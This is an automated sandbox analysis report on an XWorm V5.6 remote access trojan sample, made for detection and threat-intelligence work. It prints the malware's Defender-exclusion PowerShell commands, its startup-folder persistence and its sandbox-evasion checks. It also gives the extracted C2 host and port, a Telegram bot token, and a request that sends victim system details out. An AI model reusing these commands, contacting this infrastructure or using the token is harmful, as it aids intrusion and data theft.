Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VJV2AjJ7Na.exe

Overview

General Information

Sample name:VJV2AjJ7Na.exe
renamed because original name is a hash value
Original sample name:a9f1d82a7954d86d746086969c0d7b7b5ca65ccfd0d6a375931a6826eca1a8c7.exe
Analysis ID:1483225
MD5:99088d7d8b409b4039b02295e64a686f
SHA1:f58dad3090854f8ab5cc3de89d6cdaeb151883d4
SHA256:a9f1d82a7954d86d746086969c0d7b7b5ca65ccfd0d6a375931a6826eca1a8c7
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • VJV2AjJ7Na.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\VJV2AjJ7Na.exe" MD5: 99088D7D8B409B4039B02295E64A686F)
    • powershell.exe (PID: 1208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["main-although.gl.at.ply.gg"], "Port": "30970", "Aes key": "30970", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
VJV2AjJ7Na.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    VJV2AjJ7Na.exeJoeSecurity_XWormYara detected XWormJoe Security
      VJV2AjJ7Na.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        VJV2AjJ7Na.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xce79:$s6: VirtualBox
        • 0xcdd7:$s8: Win32_ComputerSystem
        • 0xef86:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xf023:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xf138:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xe873:$cnc4: POST / HTTP/1.1

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
          C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
            C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              C:\Users\user\AppData\Roaming\XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xce79:$s6: VirtualBox
              • 0xcdd7:$s8: Win32_ComputerSystem
              • 0xef86:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xf023:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xf138:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xe873:$cnc4: POST / HTTP/1.1

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xcc79:$s6: VirtualBox
                • 0xcbd7:$s8: Win32_ComputerSystem
                • 0xed86:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xee23:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xef38:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xe673:$cnc4: POST / HTTP/1.1
                00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  00000000.00000002.3360702564.0000000002A00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                    Process Memory Space: VJV2AjJ7Na.exe PID: 6496JoeSecurity_XWormYara detected XWormJoe Security
                      Click to see the 1 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.VJV2AjJ7Na.exe.7f0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        0.0.VJV2AjJ7Na.exe.7f0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                          0.0.VJV2AjJ7Na.exe.7f0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                          • 0xce79:$s6: VirtualBox
                          • 0xcdd7:$s8: Win32_ComputerSystem
                          • 0xef86:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          • 0xf023:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                          • 0xf138:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                          • 0xe873:$cnc4: POST / HTTP/1.1

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VJV2AjJ7Na.exe", ParentImage: C:\Users\user\Desktop\VJV2AjJ7Na.exe, ParentProcessId: 6496, ParentProcessName: VJV2AjJ7Na.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', ProcessId: 1208, ProcessName: powershell.exe
                          Sigma detected: Change PowerShell Policies to an Insecure Level
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VJV2AjJ7Na.exe", ParentImage: C:\Users\user\Desktop\VJV2AjJ7Na.exe, ParentProcessId: 6496, ParentProcessName: VJV2AjJ7Na.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', ProcessId: 1208, ProcessName: powershell.exe
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VJV2AjJ7Na.exe", ParentImage: C:\Users\user\Desktop\VJV2AjJ7Na.exe, ParentProcessId: 6496, ParentProcessName: VJV2AjJ7Na.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', ProcessId: 1208, ProcessName: powershell.exe
                          Sigma detected: Startup Folder File Write
                          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\VJV2AjJ7Na.exe, ProcessId: 6496, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VJV2AjJ7Na.exe", ParentImage: C:\Users\user\Desktop\VJV2AjJ7Na.exe, ParentProcessId: 6496, ParentProcessName: VJV2AjJ7Na.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', ProcessId: 1208, ProcessName: powershell.exe

                          Snort Signatures

                          No Snort rule has matched

                          Suricata Signatures

                          Timestamp:2024-07-26T21:23:22.379211+0200
                          SID:2852870
                          Source Port:30970
                          Destination Port:49720
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:22:55.160186+0200
                          SID:2012510
                          Source Port:443
                          Destination Port:49719
                          Protocol:TCP
                          Classtype:Potentially Bad Traffic
                          Timestamp:2024-07-26T21:22:55.159601+0200
                          SID:2853685
                          Source Port:49719
                          Destination Port:443
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-26T21:22:51.830728+0200
                          SID:2022930
                          Source Port:443
                          Destination Port:49718
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-26T21:23:16.474992+0200
                          SID:2852870
                          Source Port:30970
                          Destination Port:49720
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:24:00.825159+0200
                          SID:2852870
                          Source Port:30970
                          Destination Port:49720
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:24:01.270266+0200
                          SID:2852923
                          Source Port:49720
                          Destination Port:30970
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:22:14.312906+0200
                          SID:2022930
                          Source Port:443
                          Destination Port:49713
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-26T21:23:09.044405+0200
                          SID:2852870
                          Source Port:30970
                          Destination Port:49720
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:24:01.268441+0200
                          SID:2852870
                          Source Port:30970
                          Destination Port:49720
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:23:09.092721+0200
                          SID:2852923
                          Source Port:49720
                          Destination Port:30970
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:23:22.381102+0200
                          SID:2852923
                          Source Port:49720
                          Destination Port:30970
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:23:35.706366+0200
                          SID:2852923
                          Source Port:49720
                          Destination Port:30970
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:23:49.131894+0200
                          SID:2852870
                          Source Port:30970
                          Destination Port:49720
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:24:06.033582+0200
                          SID:2852870
                          Source Port:30970
                          Destination Port:49720
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:23:59.832923+0200
                          SID:2852870
                          Source Port:30970
                          Destination Port:49720
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:23:59.835128+0200
                          SID:2852923
                          Source Port:49720
                          Destination Port:30970
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:23:46.482216+0200
                          SID:2852870
                          Source Port:30970
                          Destination Port:49720
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:24:00.826655+0200
                          SID:2852923
                          Source Port:49720
                          Destination Port:30970
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:23:35.704548+0200
                          SID:2852870
                          Source Port:30970
                          Destination Port:49720
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:24:06.034293+0200
                          SID:2852923
                          Source Port:49720
                          Destination Port:30970
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-26T21:23:49.134083+0200
                          SID:2852923
                          Source Port:49720
                          Destination Port:30970
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: VJV2AjJ7Na.exeAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\XClient.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                          Found malware configuration
                          Source: VJV2AjJ7Na.exeMalware Configuration Extractor: Xworm {"C2 url": ["main-although.gl.at.ply.gg"], "Port": "30970", "Aes key": "30970", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\XClient.exeReversingLabs: Detection: 78%
                          Multi AV Scanner detection for submitted file
                          Source: VJV2AjJ7Na.exeReversingLabs: Detection: 78%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\XClient.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: VJV2AjJ7Na.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: VJV2AjJ7Na.exeString decryptor: main-although.gl.at.ply.gg
                          Source: VJV2AjJ7Na.exeString decryptor: 30970
                          Source: VJV2AjJ7Na.exeString decryptor: <Xwormmm>
                          Source: VJV2AjJ7Na.exeString decryptor: XWorm V5.6
                          Source: VJV2AjJ7Na.exeString decryptor: USB.exe
                          Source: VJV2AjJ7Na.exeString decryptor: %AppData%
                          Source: VJV2AjJ7Na.exeString decryptor: XClient.exe
                          Source: VJV2AjJ7Na.exeString decryptor: 7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs
                          Source: VJV2AjJ7Na.exeString decryptor: 6131620354
                          Source: VJV2AjJ7Na.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49719 version: TLS 1.2
                          Source: VJV2AjJ7Na.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Networking

                          barindex
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: main-although.gl.at.ply.gg
                          Uses the Telegram API (likely for C&C communication)
                          Source: unknownDNS query: name: api.telegram.org
                          Yara detected Generic Downloader
                          Source: Yara matchFile source: VJV2AjJ7Na.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.VJV2AjJ7Na.exe.7f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                          Source: global trafficTCP traffic: 192.168.2.6:49720 -> 147.185.221.21:30970
                          Source: global trafficHTTP traffic detected: GET /bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewIP Address: 147.185.221.21 147.185.221.21
                          Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                          Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: ip-api.com
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: ip-api.com
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: global trafficDNS traffic detected: DNS query: main-although.gl.at.ply.gg
                          Source: powershell.exe, 00000005.00000002.2301226661.000002492CDBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                          Source: powershell.exe, 00000008.00000002.2435104153.000001DBE65E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                          Source: powershell.exe, 00000002.00000002.2206032792.0000025C2D061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ml
                          Source: powershell.exe, 00000002.00000002.2177459096.0000025C12DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                          Source: powershell.exe, 00000002.00000002.2177459096.0000025C12DFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
                          Source: VJV2AjJ7Na.exe, XClient.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                          Source: powershell.exe, 00000002.00000002.2199242127.0000025C24A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2285409152.00000249247C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2412961852.000001DBDDE53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000002.00000002.2178194155.0000025C14C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.000002491497A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCE008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2178194155.0000025C149E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.0000024914751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCDDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A48511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000002.00000002.2178194155.0000025C14C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.000002491497A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCE008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000005.00000002.2301226661.000002492CDDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                          Source: powershell.exe, 00000002.00000002.2178194155.0000025C149E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.0000024914751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCDDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A48511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: VJV2AjJ7Na.exe, XClient.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                          Source: powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 0000000A.00000002.2645209881.0000025A60A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5alC
